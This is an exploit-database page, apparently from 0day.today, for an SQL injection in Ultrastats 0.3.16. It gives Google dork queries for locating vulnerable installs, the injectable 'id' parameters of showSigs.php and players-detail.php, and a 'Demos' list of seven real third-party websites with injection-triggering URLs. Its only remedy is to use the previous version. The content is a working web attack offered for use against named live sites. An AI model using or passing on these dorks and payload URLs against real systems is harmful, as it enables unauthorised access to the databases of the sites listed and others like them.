[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ultrastats 0.3.16 SQL Injection Vulnerability

Author
TUNISIAN CYBER
Risk
[
Security Risk High
]
0day-ID
0day-ID-19362
Category
web applications
Date add
09-09-2012
Platform
php
[+] Author: TUNISIAN CYBER
[+] Exploit Title:  Ultrastats 0.3.16 SQL Injection Vulnerability
[+] Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Date: 09-09-2012
[+] Category: WebApp
[+] Google Dork: intext:Created 2005-2008 - By deltaray   Support Forums |  Ultrastats showSigs.php?id=
                 intext:Created 2005-2008 - By deltaray   Support Forums |  Ultrastats players-detail.php?id=     
[+] Tested on: Windows 7 Professionnel / Windows XP SP3 EN
[+] Vendor: http://shooter-szene.4players.de/module-Downloads-view-cid-320-start-0.phtml

########################################################################################

Proof:
127.0.0.1/players-detail.php?id=[number]
127.0.0.1/showSigs.php?id=[number]


Demos:
http://a2gaming.com/ultrastats/showSigs.php?id=1207824794'
http://tmhclan.de/ultrastats/showSigs.php?id=1'
http://stats.gbcclan.de/codwaw/showSigs.php?id=294799313'
http://www.bro-players.at/ultrastats/src/showSigs.php?id=4122214115'
http://egg-stats.nsplanet.net/showSigs.php?id=2'
http://cod4.gigelf.fr/players-detail.php?id=1'
http://www.russianarmy.ru/COD4UltraStats/players-detail.php?id=4'


Solution:
using the old version
0.3.15
########################################################################################
Greets to: Allah , And TN H4CK3RZ
###########################################################################################



#  0day.today [2024-12-25]  #